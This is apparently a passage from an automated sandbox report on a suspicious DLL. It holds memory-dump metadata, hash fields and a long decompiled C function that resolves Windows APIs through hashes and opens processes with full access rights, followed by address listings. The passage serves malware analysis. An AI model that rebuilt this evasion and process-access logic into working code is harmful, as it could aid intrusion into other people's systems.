                                                                                        • Associated: 00000002.00000002.749036684.000000001001A000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000002.00000002.749045623.000000001001D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000002.00000002.749056111.000000001001F000.00000002.00020000.sdmp Download File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID: 0-3916222277
                                                                                        • Opcode ID: f316cd89f61520e6bbaca91e9e5fd7c78ea1d630a68c88449f3782008d0636a0
                                                                                        • Instruction ID: 00802be3918ea6aeb11fe45908ae931f8062d9273d37329102aa76dba10a21a3
                                                                                        • Opcode Fuzzy Hash: f316cd89f61520e6bbaca91e9e5fd7c78ea1d630a68c88449f3782008d0636a0
                                                                                        • Instruction Fuzzy Hash: 60128C755082019FE714DF24C882A6FB7E5FFC5394F108A2DF899972AADB30AC45DB42
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 93%
                                                                                        			E1000846C(signed int* __ecx, intOrPtr __edx, void* __eflags) {
                                                                                        				void* __esi;
                                                                                        				void* __ebp;
                                                                                        				signed int* _t173;
                                                                                        				signed int* _t178;
                                                                                        				void* _t180;
                                                                                        				void* _t181;
                                                                                        				intOrPtr* _t188;
                                                                                        				signed int _t202;
                                                                                        				intOrPtr* _t211;
                                                                                        				intOrPtr* _t212;
                                                                                        				intOrPtr* _t217;
                                                                                        				signed int* _t218;
                                                                                        				void* _t219;
                                                                                        				void* _t220;
                                                                                        				void* _t237;
                                                                                        				void* _t238;
                                                                                        				signed int* _t246;
                                                                                        				void* _t247;
                                                                                        				signed int* _t258;
                                                                                        				intOrPtr* _t269;
                                                                                        				signed int* _t277;
                                                                                        				intOrPtr* _t279;
                                                                                        				void* _t283;
                                                                                        				void* _t285;
                                                                                        				void* _t287;
                                                                                        				signed int* _t296;
                                                                                        				void* _t299;
                                                                                        				signed int* _t308;
                                                                                        				intOrPtr* _t310;
                                                                                        				signed int _t315;
                                                                                        				intOrPtr _t317;
                                                                                        				signed int* _t322;
                                                                                        				signed int _t323;
                                                                                        				signed int _t324;
                                                                                        				void* _t343;
                                                                                        				void* _t414;
                                                                                        				signed int _t415;
                                                                                        				signed int* _t421;
                                                                                        				signed int _t427;
                                                                                        				intOrPtr* _t428;
                                                                                        				intOrPtr* _t429;
                                                                                        				signed int _t431;
                                                                                        				signed int _t433;
                                                                                        				signed int _t437;
                                                                                        				signed int _t438;
                                                                                        				signed int _t439;
                                                                                        				signed int _t442;
                                                                                        				void* _t443;
                                                                                        				signed int _t444;
                                                                                        				void* _t445;
                                                                                        				signed int _t446;
                                                                                        				intOrPtr* _t449;
                                                                                        
                                                                                        				 *_t449 = __ecx + 0x1c;
                                                                                        				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
                                                                                        				 *(_t449 + 4) = __ecx;
                                                                                        				 *(_t449 + 0x84) = 0;
                                                                                        				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
                                                                                        				while(1) {
                                                                                        					_t413 =  *(_t449 + 0x6c);
                                                                                        					E1000B69C(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
                                                                                        					if(E1000F4F4(_t449 + 0x24) == 0) {
                                                                                        						goto L3;
                                                                                        					} else {
                                                                                        						( *(_t449 + 4))[0xb] = 0;
                                                                                        						E1000F678(_t449 + 0x24);
                                                                                        					}
                                                                                        					L60:
                                                                                        					_t317 = 0xffffffffffffffff;
                                                                                        					L62:
                                                                                        					if(_t317 != 0) {
                                                                                        						L65:
                                                                                        						return _t317;
                                                                                        					}
                                                                                        					if( *(_t449 + 0x84) != 0x20) {
                                                                                        						E1001223C(0x5dc, _t413, _t430);
                                                                                        						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
                                                                                        						continue;
                                                                                        					}
                                                                                        					_t317 = 0xffffffffffffffff;
                                                                                        					goto L65;
                                                                                        					L3:
                                                                                        					__eflags =  *( *(_t449 + 4));
                                                                                        					if( *( *(_t449 + 4)) <= 0) {
                                                                                        						L21:
                                                                                        						__eflags =  *(_t449 + 0x20);
                                                                                        						if( *(_t449 + 0x20) <= 0) {
                                                                                        							L33:
                                                                                        							E1000F678(_t449 + 0x24);
                                                                                        							_t173 =  *(_t449 + 4);
                                                                                        							__eflags = _t173[0xb];
                                                                                        							if(_t173[0xb] == 0) {
                                                                                        								L46:
                                                                                        								 *((intOrPtr*)(_t449 + 8)) = 0;
                                                                                        								 *((intOrPtr*)(_t449 + 0xc)) = 0;
                                                                                        								E1000F5A8(_t449 + 0x14, 0);
                                                                                        								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
                                                                                        								 *((intOrPtr*)(_t449 + 0x38)) = 0;
                                                                                        								E1000F5A8(_t449 + 0x40, 0);
                                                                                        								_t178 =  *(_t449 + 4);
                                                                                        								_t414 = 0x40;
                                                                                        								__eflags = _t178[6] - 0x40;
                                                                                        								_t415 =  <  ? _t178[6] : _t414;
                                                                                        								 *(_t449 + 0x80) = _t415;
                                                                                        								__eflags = _t415;
                                                                                        								if(_t415 <= 0) {
                                                                                        									L57:
                                                                                        									_t413 = E1000F4E0(_t449 + 0x14, 0);
                                                                                        									_t180 = E10012928( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
                                                                                        									_t132 = _t180 - 0x80; // -128
                                                                                        									_t181 = _t132;
                                                                                        									__eflags = _t181 - 0x3f;
                                                                                        									_t315 =  <=  ? _t181 : _t180;
                                                                                        									__eflags = _t315 - 0x102;
                                                                                        									if(_t315 == 0x102) {
                                                                                        										L59:
                                                                                        										E1000B608(_t449 + 0x34);
                                                                                        										E1000B608(_t449 + 8);
                                                                                        										goto L60;
                                                                                        									}
                                                                                        									__eflags = _t315 - 0x3f;
                                                                                        									if(_t315 <= 0x3f) {
                                                                                        										__eflags = _t315 << 2;
                                                                                        										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E1000F4E0( *(_t449 + 4), _t315 << 2)));
                                                                                        										_t188 = E1000F4E0( *(_t449 + 0x7c), _t315 << 2);
                                                                                        										_t413 =  *(_t449 + 4);
                                                                                        										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
                                                                                        										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
                                                                                        										E1000B608(_t449 + 0x34);
                                                                                        										E1000B608(_t449 + 8);
                                                                                        										goto L62;
                                                                                        									}
                                                                                        									goto L59;
                                                                                        								}
                                                                                        								_t446 = 0;
                                                                                        								__eflags = 0;
                                                                                        								while(1) {
                                                                                        									E1000CAD0(_t449 + 0x4c);
                                                                                        									_t413 = 0;
                                                                                        									_t343 = _t449 + 0x4c;
                                                                                        									 *((char*)(_t343 + 4)) = 0;
                                                                                        									 *((intOrPtr*)(_t343 + 0x20)) = 0;
                                                                                        									__eflags = E1000C2C4(_t343);
                                                                                        									if(__eflags != 0) {
                                                                                        										break;
                                                                                        									}
                                                                                        									E1000F84C(_t449 + 0x14, E1000F4F0(_t449 + 0x10) + 4);
                                                                                        									 *((intOrPtr*)(E1000F4E0(_t449 + 0x14, E1000F4F0(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
                                                                                        									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
                                                                                        									_t202 = E1001303C(0xfe338407, 0xa8c8a645);
                                                                                        									__eflags = _t202;
                                                                                        									if(_t202 == 0) {
                                                                                        										L51:
                                                                                        										_t413 =  *(_t449 + 0x6c);
                                                                                        										__eflags = _t413;
                                                                                        										if(__eflags == 0) {
                                                                                        											break;
                                                                                        										}
                                                                                        										__eflags = _t413 - 0xffffffff;
                                                                                        										if(__eflags != 0) {
                                                                                        											E1000F84C(_t449 + 0x40, E1000F4F0(_t449 + 0x3c) + 4);
                                                                                        											 *(E1000F4E0(_t449 + 0x40, E1000F4F0(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
                                                                                        											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
                                                                                        											E1000CD68(_t449 + 0x4c, __eflags);
                                                                                        											_t446 = _t446 + 1;
                                                                                        											__eflags = _t446 -  *(_t449 + 0x80);
                                                                                        											if(_t446 <  *(_t449 + 0x80)) {
                                                                                        												continue;
                                                                                        											}
                                                                                        											_t431 = 0;
                                                                                        											__eflags = 0;
                                                                                        											do {
                                                                                        												_t211 = E1000F4E0( *(_t449 + 4), _t431 * 4);
                                                                                        												_t212 = E1000F4E0(_t449 + 0x40, _t431 * 4);
                                                                                        												E10008B9C( *_t211, E100102D4(0xfe338407, 0x1a9c1df5),  *_t212, 0, 0);
                                                                                        												_t431 = _t431 + 1;
                                                                                        												__eflags = _t431 -  *(_t449 + 0x80);
                                                                                        											} while (_t431 <  *(_t449 + 0x80));
                                                                                        											goto L57;
                                                                                        										}
                                                                                        										break;
                                                                                        									}
                                                                                        									_t413 = 0;
                                                                                        									_push(2);
                                                                                        									_push(0);
                                                                                        									_push(0);
                                                                                        									_push(_t449 + 0x6c);
                                                                                        									_push( *((intOrPtr*)(_t449 + 0x78)));
                                                                                        									_push( *((intOrPtr*)(_t449 + 0x60)));
                                                                                        									_push(0xffffffff);
                                                                                        									asm("int3");
                                                                                        									asm("int3");
                                                                                        									__eflags = _t202;
                                                                                        									if(__eflags != 0) {
                                                                                        										break;
                                                                                        									}
                                                                                        									goto L51;
                                                                                        								}
                                                                                        								E1000CD68(_t449 + 0x4c, __eflags);
                                                                                        								goto L59;
                                                                                        							}
                                                                                        							_t427 =  *_t173;
                                                                                        							__eflags = _t427;
                                                                                        							if(_t427 <= 0) {
                                                                                        								goto L46;
                                                                                        							}
                                                                                        							_t430 = 0;
                                                                                        							__eflags = 0;
                                                                                        							_t322 =  &(_t173[1]);
                                                                                        							while(1) {
                                                                                        								_t433 = _t430 * 4;
                                                                                        								_t217 = E1000F4E0(_t322, _t433);
                                                                                        								_t218 =  *(_t449 + 4);
                                                                                        								__eflags =  *_t217 - _t218[0xc];
                                                                                        								if( *_t217 == _t218[0xc]) {
                                                                                        									break;
                                                                                        								}
                                                                                        								_t430 = _t430 + 1;
                                                                                        								__eflags = _t430 - _t427;
                                                                                        								if(_t430 < _t427) {
                                                                                        									continue;
                                                                                        								}
                                                                                        								goto L46;
                                                                                        							}
                                                                                        							__eflags = _t430 - 0xffffffff;
                                                                                        							if(_t430 != 0xffffffff) {
                                                                                        								_t219 = E1000F4F0( *_t449);
                                                                                        								__eflags = _t219 - _t433;
                                                                                        								if(_t219 > _t433) {
                                                                                        									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
                                                                                        									_t247 = E1000F4F0( *_t449);
                                                                                        									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
                                                                                        									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
                                                                                        										 *((intOrPtr*)(_t449 + 0x90)) = E1000F4E0( *(_t449 + 4), _t433);
                                                                                        										 *((intOrPtr*)(_t449 + 0x8c)) = E1000F4E0( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
                                                                                        										E100138C8( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E1000F4F0( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
                                                                                        										_t449 = _t449 + 0xc;
                                                                                        									}
                                                                                        									E1000F84C( *(_t449 + 4), E1000F4F0( *_t449) + 0xfffffffc);
                                                                                        									_t421 =  *(_t449 + 4);
                                                                                        									_t75 =  &(_t421[6]);
                                                                                        									 *_t75 = _t421[6] - 1;
                                                                                        									__eflags =  *_t75;
                                                                                        								}
                                                                                        								_t220 = E1000F4F0(_t322);
                                                                                        								__eflags = _t220 - _t433;
                                                                                        								if(_t220 > _t433) {
                                                                                        									_t430 = 4 + _t430 * 4;
                                                                                        									_t237 = E1000F4F0(_t322);
                                                                                        									__eflags = _t237 - _t430;
                                                                                        									if(_t237 > _t430) {
                                                                                        										_t238 = E1000F4E0(_t322, _t433);
                                                                                        										 *((intOrPtr*)(_t449 + 0x94)) = E1000F4E0(_t322, _t430);
                                                                                        										E100138C8(_t238,  *((intOrPtr*)(_t449 + 0x98)), E1000F4F0(_t322) - _t430);
                                                                                        										_t449 = _t449 + 0xc;
                                                                                        									}
                                                                                        									E1000F84C(_t322, E1000F4F0(_t322) + 0xfffffffc);
                                                                                        									_t246 =  *(_t449 + 4);
                                                                                        									 *_t246 =  *_t246 - 1;
                                                                                        									__eflags =  *_t246;
                                                                                        								}
                                                                                        								E1000F84C( *(_t449 + 4), E1000F4F0( *_t449) + 4);
                                                                                        								 *(E1000F4E0( *(_t449 + 4), E1000F4F0( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
                                                                                        								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
                                                                                        								E1000F84C(_t322, E1000F4F0(_t322) + 4);
                                                                                        								 *(E1000F4E0(_t322, E1000F4F0(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
                                                                                        								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
                                                                                        							}
                                                                                        							goto L46;
                                                                                        						}
                                                                                        						_t323 = 0;
                                                                                        						__eflags = 0;
                                                                                        						do {
                                                                                        							 *(_t449 + 0x7c) = _t323 * 4;
                                                                                        							_t428 = E1000F4E0(_t449 + 0x28, _t323 * 4);
                                                                                        							_t258 =  *(_t449 + 4);
                                                                                        							_t430 =  *_t258;
                                                                                        							__eflags = _t430;
                                                                                        							if(_t430 <= 0) {
                                                                                        								L29:
                                                                                        								_t437 = E1001303C(0x10154545, 0xc2a75cb8);
                                                                                        								__eflags = _t437;
                                                                                        								if(_t437 != 0) {
                                                                                        									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E1000F4E0(_t449 + 0x28,  *(_t449 + 0x7c)))));
                                                                                        									__eflags = _t439;
                                                                                        									if(_t439 != 0) {
                                                                                        										E1000F84C( *(_t449 + 4), E1000F4F0( *_t449) + 4);
                                                                                        										 *(E1000F4E0( *(_t449 + 4), E1000F4F0( *_t449) + 0xfffffffc)) = _t439;
                                                                                        										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
                                                                                        										_t269 = E1000F4E0(_t449 + 0x28,  *(_t449 + 0x7c));
                                                                                        										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
                                                                                        										E1000F84C( *((intOrPtr*)(_t449 + 0x74)), E1000F4F0( &(( *(_t449 + 4))[1])) + 4);
                                                                                        										 *((intOrPtr*)(E1000F4E0( *((intOrPtr*)(_t449 + 0x74)), E1000F4F0( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
                                                                                        										_t277 =  *(_t449 + 4);
                                                                                        										 *_t277 =  *_t277 + 1;
                                                                                        										__eflags =  *_t277;
                                                                                        									}
                                                                                        								}
                                                                                        								goto L32;
                                                                                        							}
                                                                                        							_t438 = 0;
                                                                                        							__eflags = 0;
                                                                                        							 *(_t449 + 0x88) =  &(_t258[1]);
                                                                                        							while(1) {
                                                                                        								_t279 = E1000F4E0( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
                                                                                        								__eflags =  *_t279 -  *_t428;
                                                                                        								if( *_t279 ==  *_t428) {
                                                                                        									break;
                                                                                        								}
                                                                                        								_t438 = _t438 + 1;
                                                                                        								__eflags = _t438 - _t430;
                                                                                        								if(_t438 < _t430) {
                                                                                        									continue;
                                                                                        								}
                                                                                        								goto L29;
                                                                                        							}
                                                                                        							__eflags = _t438 - 0xffffffff;
                                                                                        							if(_t438 == 0xffffffff) {
                                                                                        								goto L29;
                                                                                        							}
                                                                                        							L32:
                                                                                        							_t323 = _t323 + 1;
                                                                                        							__eflags = _t323 -  *(_t449 + 0x20);
                                                                                        						} while (_t323 <  *(_t449 + 0x20));
                                                                                        						goto L33;
                                                                                        					} else {
                                                                                        						_t324 = 0;
                                                                                        						__eflags = 0;
                                                                                        						do {
                                                                                        							 *(_t449 + 0x64) = _t324 * 4;
                                                                                        							_t429 = E1000F4E0( *(_t449 + 0x7c), _t324 * 4);
                                                                                        							_t430 =  *(_t449 + 0x20);
                                                                                        							__eflags = _t430;
                                                                                        							if(_t430 <= 0) {
                                                                                        								L11:
                                                                                        								_t430 =  &(( *(_t449 + 4))[1]);
                                                                                        								_t283 = E1000F4F0( &(( *(_t449 + 4))[1]));
                                                                                        								__eflags = _t283 -  *(_t449 + 0x64);
                                                                                        								if(_t283 >  *(_t449 + 0x64)) {
                                                                                        									_t443 = 4 + _t324 * 4;
                                                                                        									_t299 = E1000F4F0(_t430);
                                                                                        									__eflags = _t299 - _t443;
                                                                                        									if(_t299 > _t443) {
                                                                                        										 *((intOrPtr*)(_t449 + 0x9c)) = E1000F4E0(_t430,  *(_t449 + 0x64));
                                                                                        										 *((intOrPtr*)(_t449 + 0x98)) = E1000F4E0(_t430, _t443);
                                                                                        										E100138C8( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E1000F4F0(_t430) - _t443);
                                                                                        										_t449 = _t449 + 0xc;
                                                                                        									}
                                                                                        									E1000F84C(_t430, E1000F4F0(_t430) + 0xfffffffc);
                                                                                        									_t308 =  *(_t449 + 4);
                                                                                        									 *_t308 =  *_t308 - 1;
                                                                                        									__eflags =  *_t308;
                                                                                        								}
                                                                                        								_t442 = E1001303C(0xfe338407, 0x77fa1d17);
                                                                                        								__eflags = _t442;
                                                                                        								if(_t442 != 0) {
                                                                                        									 *_t442( *(E1000F4E0( *(_t449 + 4),  *(_t449 + 0x64))));
                                                                                        								}
                                                                                        								_t285 = E1000F4F0( *_t449);
                                                                                        								__eflags = _t285 -  *(_t449 + 0x64);
                                                                                        								if(_t285 >  *(_t449 + 0x64)) {
                                                                                        									_t445 = 4 + _t324 * 4;
                                                                                        									_t287 = E1000F4F0( *_t449);
                                                                                        									__eflags = _t287 - _t445;
                                                                                        									if(_t287 > _t445) {
                                                                                        										_t430 = E1000F4E0( *(_t449 + 4),  *(_t449 + 0x64));
                                                                                        										 *((intOrPtr*)(_t449 + 0xa0)) = E1000F4E0( *(_t449 + 4), _t445);
                                                                                        										E100138C8(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E1000F4F0( *_t449) - _t445);
                                                                                        										_t449 = _t449 + 0xc;
                                                                                        									}
                                                                                        									E1000F84C( *(_t449 + 4), E1000F4F0( *_t449) + 0xfffffffc);
                                                                                        									_t296 =  *(_t449 + 4);
                                                                                        									_t33 =  &(_t296[6]);
                                                                                        									 *_t33 = _t296[6] - 1;
                                                                                        									__eflags =  *_t33;
                                                                                        								}
                                                                                        								_t324 = _t324 - 1;
                                                                                        								__eflags = _t324;
                                                                                        								goto L20;
                                                                                        							}
                                                                                        							_t444 = 0;
                                                                                        							__eflags = 0;
                                                                                        							while(1) {
                                                                                        								_t310 = E1000F4E0(_t449 + 0x28, _t444 * 4);
                                                                                        								__eflags =  *_t310 -  *_t429;
                                                                                        								if( *_t310 ==  *_t429) {
                                                                                        									break;
                                                                                        								}
                                                                                        								_t444 = _t444 + 1;
                                                                                        								__eflags = _t444 - _t430;
                                                                                        								if(_t444 < _t430) {
                                                                                        									continue;
                                                                                        								}
                                                                                        								goto L11;
                                                                                        							}
                                                                                        							__eflags = _t444 - 0xffffffff;
                                                                                        							if(_t444 == 0xffffffff) {
                                                                                        								goto L11;
                                                                                        							}
                                                                                        							L20:
                                                                                        							_t324 = _t324 + 1;
                                                                                        							__eflags = _t324 -  *( *(_t449 + 4));
                                                                                        						} while (_t324 <  *( *(_t449 + 4)));
                                                                                        						goto L21;
                                                                                        					}
                                                                                        				}
                                                                                        			}























































                                                                                        0x10008479
                                                                                        0x1000847f
                                                                                        0x10008483
                                                                                        0x10008487
                                                                                        0x10008492
                                                                                        0x10008496
                                                                                        0x1000849b
                                                                                        0x100084a3
                                                                                        0x100084b3
                                                                                        0x00000000
                                                                                        0x100084b5
                                                                                        0x100084bd
                                                                                        0x100084c4
                                                                                        0x100084c4
                                                                                        0x10008a17
                                                                                        0x10008a19
                                                                                        0x10008a5a
                                                                                        0x10008a5c
                                                                                        0x10008a6b
                                                                                        0x10008a77
                                                                                        0x10008a77
                                                                                        0x10008a66
                                                                                        0x10008a7d
                                                                                        0x10008a82
                                                                                        0x00000000
                                                                                        0x10008a82
                                                                                        0x10008a6a
                                                                                        0x00000000
                                                                                        0x100084ce
                                                                                        0x100084d2
                                                                                        0x100084d5
                                                                                        0x100085dd
                                                                                        0x100085dd
                                                                                        0x100085e2
                                                                                        0x10008705
                                                                                        0x10008709
                                                                                        0x1000870e
                                                                                        0x10008712
                                                                                        0x10008716
                                                                                        0x1000884c
                                                                                        0x1000884e
                                                                                        0x10008852
                                                                                        0x1000885b
                                                                                        0x10008866
                                                                                        0x1000886a
                                                                                        0x10008873
                                                                                        0x10008878
                                                                                        0x1000887e
                                                                                        0x1000887f
                                                                                        0x10008883
                                                                                        0x10008887
                                                                                        0x1000888e
                                                                                        0x10008890
                                                                                        0x100089d0
                                                                                        0x100089e1
                                                                                        0x100089e8
                                                                                        0x100089ef
                                                                                        0x100089ef
                                                                                        0x100089f2
                                                                                        0x100089f5
                                                                                        0x100089f8
                                                                                        0x100089fe
                                                                                        0x10008a05
                                                                                        0x10008a09
                                                                                        0x10008a12
                                                                                        0x00000000
                                                                                        0x10008a12
                                                                                        0x10008a00
                                                                                        0x10008a03
                                                                                        0x10008a1c
                                                                                        0x10008a34
                                                                                        0x10008a37
                                                                                        0x10008a3c
                                                                                        0x10008a46
                                                                                        0x10008a49
                                                                                        0x10008a4c
                                                                                        0x10008a55
                                                                                        0x00000000
                                                                                        0x10008a55
                                                                                        0x00000000
                                                                                        0x10008a03
                                                                                        0x10008898
                                                                                        0x10008898
                                                                                        0x1000889a
                                                                                        0x1000889e
                                                                                        0x100088a3
                                                                                        0x100088a5
                                                                                        0x100088a9
                                                                                        0x100088ac
                                                                                        0x100088b4
                                                                                        0x100088b6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x100088cd
                                                                                        0x100088e8
                                                                                        0x100088ea
                                                                                        0x100088f8
                                                                                        0x100088fd
                                                                                        0x100088ff
                                                                                        0x1000891c
                                                                                        0x1000891c
                                                                                        0x10008920
                                                                                        0x10008922
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10008924
                                                                                        0x10008927
                                                                                        0x10008948
                                                                                        0x10008967
                                                                                        0x1000896d
                                                                                        0x10008970
                                                                                        0x10008975
                                                                                        0x10008976
                                                                                        0x1000897d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10008985
                                                                                        0x10008985
                                                                                        0x10008987
                                                                                        0x10008993
                                                                                        0x1000899f
                                                                                        0x100089c1
                                                                                        0x100089c6
                                                                                        0x100089c7
                                                                                        0x100089c7
                                                                                        0x00000000
                                                                                        0x10008987
                                                                                        0x00000000
                                                                                        0x10008927
                                                                                        0x10008901
                                                                                        0x10008907
                                                                                        0x10008909
                                                                                        0x1000890a
                                                                                        0x1000890b
                                                                                        0x1000890c
                                                                                        0x10008910
                                                                                        0x10008914
                                                                                        0x10008916
                                                                                        0x10008917
                                                                                        0x10008918
                                                                                        0x1000891a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000891a
                                                                                        0x1000892d
                                                                                        0x00000000
                                                                                        0x1000892d
                                                                                        0x1000871c
                                                                                        0x1000871e
                                                                                        0x10008720
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000872a
                                                                                        0x1000872a
                                                                                        0x1000872c
                                                                                        0x1000872f
                                                                                        0x10008731
                                                                                        0x10008739
                                                                                        0x10008740
                                                                                        0x10008744
                                                                                        0x10008747
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10008843
                                                                                        0x10008844
                                                                                        0x10008846
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10008846
                                                                                        0x1000874d
                                                                                        0x10008750
                                                                                        0x10008759
                                                                                        0x1000875e
                                                                                        0x10008760
                                                                                        0x1000876c
                                                                                        0x10008770
                                                                                        0x10008775
                                                                                        0x10008779
                                                                                        0x10008b56
                                                                                        0x10008b6a
                                                                                        0x10008b8c
                                                                                        0x10008b91
                                                                                        0x10008b91
                                                                                        0x1000878f
                                                                                        0x10008794
                                                                                        0x10008798
                                                                                        0x10008798
                                                                                        0x10008798
                                                                                        0x10008798
                                                                                        0x1000879d
                                                                                        0x100087a2
                                                                                        0x100087a4
                                                                                        0x100087a8
                                                                                        0x100087af
                                                                                        0x100087b4
                                                                                        0x100087b6
                                                                                        0x10008b17
                                                                                        0x10008b26
                                                                                        0x10008b3f
                                                                                        0x10008b44
                                                                                        0x10008b44
                                                                                        0x100087c9
                                                                                        0x100087ce
                                                                                        0x100087d2
                                                                                        0x100087d2
                                                                                        0x100087d2
                                                                                        0x100087e4
                                                                                        0x10008805
                                                                                        0x1000880d
                                                                                        0x1000881b
                                                                                        0x10008839
                                                                                        0x1000883f
                                                                                        0x1000883f
                                                                                        0x00000000
                                                                                        0x10008750
                                                                                        0x100085e8
                                                                                        0x100085e8
                                                                                        0x100085ea
                                                                                        0x100085f1
                                                                                        0x100085ff
                                                                                        0x10008601
                                                                                        0x10008605
                                                                                        0x10008607
                                                                                        0x10008609
                                                                                        0x10008644
                                                                                        0x10008653
                                                                                        0x10008655
                                                                                        0x10008657
                                                                                        0x10008675
                                                                                        0x10008677
                                                                                        0x10008679
                                                                                        0x1000868b
                                                                                        0x100086a9
                                                                                        0x100086b2
                                                                                        0x100086b5
                                                                                        0x100086c3
                                                                                        0x100086d4
                                                                                        0x100086f2
                                                                                        0x100086f4
                                                                                        0x100086f8
                                                                                        0x100086f8
                                                                                        0x100086f8
                                                                                        0x10008679
                                                                                        0x00000000
                                                                                        0x10008657
                                                                                        0x1000860f
                                                                                        0x1000860f
                                                                                        0x10008614
                                                                                        0x1000861b
                                                                                        0x1000862a
                                                                                        0x10008631
                                                                                        0x10008633
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000863f
                                                                                        0x10008640
                                                                                        0x10008642
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10008642
                                                                                        0x10008635
                                                                                        0x10008638
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x100086fa
                                                                                        0x100086fa
                                                                                        0x100086fb
                                                                                        0x100086fb
                                                                                        0x00000000
                                                                                        0x100084db
                                                                                        0x100084db
                                                                                        0x100084db
                                                                                        0x100084dd
                                                                                        0x100084e4
                                                                                        0x100084f2
                                                                                        0x100084f4
                                                                                        0x100084f8
                                                                                        0x100084fa
                                                                                        0x10008526
                                                                                        0x1000852a
                                                                                        0x1000852f
                                                                                        0x10008534
                                                                                        0x10008538
                                                                                        0x1000853c
                                                                                        0x10008543
                                                                                        0x10008548
                                                                                        0x1000854a
                                                                                        0x10008ad9
                                                                                        0x10008ae8
                                                                                        0x10008b07
                                                                                        0x10008b0c
                                                                                        0x10008b0c
                                                                                        0x1000855d
                                                                                        0x10008562
                                                                                        0x10008566
                                                                                        0x10008566
                                                                                        0x10008566
                                                                                        0x10008577
                                                                                        0x10008579
                                                                                        0x1000857b
                                                                                        0x1000858c
                                                                                        0x1000858c
                                                                                        0x10008591
                                                                                        0x10008596
                                                                                        0x1000859a
                                                                                        0x1000859f
                                                                                        0x100085a6
                                                                                        0x100085ab
                                                                                        0x100085ad
                                                                                        0x10008a9b
                                                                                        0x10008aa7
                                                                                        0x10008ac1
                                                                                        0x10008ac6
                                                                                        0x10008ac6
                                                                                        0x100085c3
                                                                                        0x100085c8
                                                                                        0x100085cc
                                                                                        0x100085cc
                                                                                        0x100085cc
                                                                                        0x100085cc
                                                                                        0x100085cf
                                                                                        0x100085cf
                                                                                        0x00000000
                                                                                        0x100085cf
                                                                                        0x100084fe
                                                                                        0x100084fe
                                                                                        0x10008500
                                                                                        0x1000850c
                                                                                        0x10008513
                                                                                        0x10008515
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10008521
                                                                                        0x10008522
                                                                                        0x10008524
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10008524
                                                                                        0x10008517
                                                                                        0x1000851a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x100085d0
                                                                                        0x100085d4
                                                                                        0x100085d5
                                                                                        0x100085d5
                                                                                        0x00000000
                                                                                        0x100084dd
                                                                                        0x100084d5

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.749018753.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000002.00000002.749011351.0000000010000000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000002.00000002.749036684.000000001001A000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000002.00000002.749045623.000000001001D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000002.00000002.749056111.000000001001F000.00000002.00020000.sdmp Download File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID: 0-3916222277
                                                                                        • Opcode ID: 887bce6b44e58bdc07887652d35a07c6200a51f35c5fdbbf3387b90d89984ff0
                                                                                        • Instruction ID: 1bb0d61435caef0e58cc5acfc0dead8aa63cbeb4aacce1040875febecc2d3119
